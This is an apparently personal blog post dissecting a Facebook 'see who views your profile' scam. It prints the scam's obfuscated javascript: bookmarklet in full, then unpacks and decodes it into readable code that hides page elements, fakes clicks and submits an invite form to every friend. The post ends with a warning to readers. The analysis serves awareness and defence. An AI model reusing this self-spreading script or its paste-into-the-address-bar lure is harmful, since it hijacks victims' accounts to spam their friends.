inportb

This morning I woke up to an inbox full of suggestions to “like” a certain page on Facebook. Curious, I decided to have a look. It turned out to be a service promising to show you who views your profile (which, of course, is absolutely absurd), and all you had to do was press ctrl+c, alt+d, ctrl+v, and enter. Apparently, a lot of people did this and found themselves wondering how their browsers got hijacked.

I realized that the instructions had me copy some hidden text to clipboard, select the URL entry bar, paste the text, and navigate to it. The “text” happened to be a bit of JavaScript (commonly known as a bookmarklet or favelet), and said “navigation” executes the code. Let’s have a look:

javascript:(function(){a='app120038468024406_jop';b='app120038468024406_jode';ifc='app120038468024406_ifc';ifo='app120038468024406_ifo';mw='app120038468024406_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();

At first glance, there seems to be a dense core of obfuscated code generated by Dean Edwards’s JavaScript Packer. Since it’s a bookmarklet, I thought Packer was used here for compression. I was curious, so I unpacked the code to reveal:

var _0x95ea=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
d=document;
d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];
d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];
s=d[_0x95ea[2]](_0x95ea[6]);
m=d[_0x95ea[2]](_0x95ea[7]);
c=d[_0x95ea[9]](_0x95ea[8]);
c[_0x95ea[11]](_0x95ea[10],true,true);
s[_0x95ea[12]](c);
setTimeout(function(){fs[_0x95ea[13]]()},5000);
setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);
setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000);

Clearly, compression wasn’t the goal. I ran the array of obfuscated strings through Firebug and came up with some familiar content:

var _0x95ea=["visibility","style","getElementById","hidden","innerHTML","value","suggest","likeme","MouseEvents","createEvent","click","initEvent","dispatchEvent","select_all","sgm_invite_form","/ajax/social_graph/invite_dialog.php","submitDialog"];

At this point, I got the feeling that this bookmarklet hides things that should not be hidden, sends click events, and ultimately submits a form. Substituting the array’s contents into the rest of the code, I got:

document.getElementById(mw).style.visibility="hidden";
document.getElementById(a).innerHTML=document.getElementById(b).value;
s=document.getElementById("suggest");
m=document.getElementById("likeme");
c=document.createEvent("MouseEvents");
c.initEvent("click",true,true);
s.dispatchEvent(c);
setTimeout(function(){fs.select_all()},5000);
setTimeout(function(){SocialGraphManager.submitDialog("sgm_invite_form","/ajax/social_graph/invite_dialog.php")},5000);
setTimeout(function(){m.dispatchEvent(c);document.getElementById(ifo).innerHTML=document.getElementById(ifc).value},5000);

Ultimately, we end up with the following snippet, which makes you “like” the page and suggest it to all your friends:

a='app120038468024406_jop';
b='app120038468024406_jode';
ifc='app120038468024406_ifc';
ifo='app120038468024406_ifo';
mw='app120038468024406_mwrapper';
document.getElementById(mw).style.visibility="hidden";
document.getElementById(a).innerHTML=document.getElementById(b).value;
eventClick=document.createEvent("MouseEvents");
eventClick.initEvent("click",true,true);
document.getElementById("suggest").dispatchEvent(eventClick);
setTimeout(function(){fs.select_all()},5000);
setTimeout(function(){SocialGraphManager.submitDialog("sgm_invite_form","/ajax/social_graph/invite_dialog.php")},5000);
setTimeout(function(){document.getElementById("likeme").dispatchEvent(eventClick);document.getElementById(ifo).innerHTML=document.getElementById(ifc).value},5000);

While these scams are common on Facebook, I’d like to take this opportunity to warn everyone to always be vigilant while navigating the Internet. The script of the day did not do much real damage, but at least a hundred thousand Facebook users were spammed; tens of thousands were scammed into propagating this viral page.

But what about seeing who’s viewing your profile?

Think about it this way… would you like others to know about your browsing habits? As I said earlier, this is an absurd breach of privacy, and fortunately Facebook does not support this “functionality” by default. Third-party apps have different policies, however, and these apps have access to privileged information about their users. In particular, a Facebook app is able to track when it is viewed by its users. So when a Facebook user with this tracking app enabled checks out another Facebook user with the app on his/her profile, the app sees and records the viewing relationship.

Pages don’t have this functionality, however; only apps do. As far as the viral page goes, it is a fake.

Popularity: 10%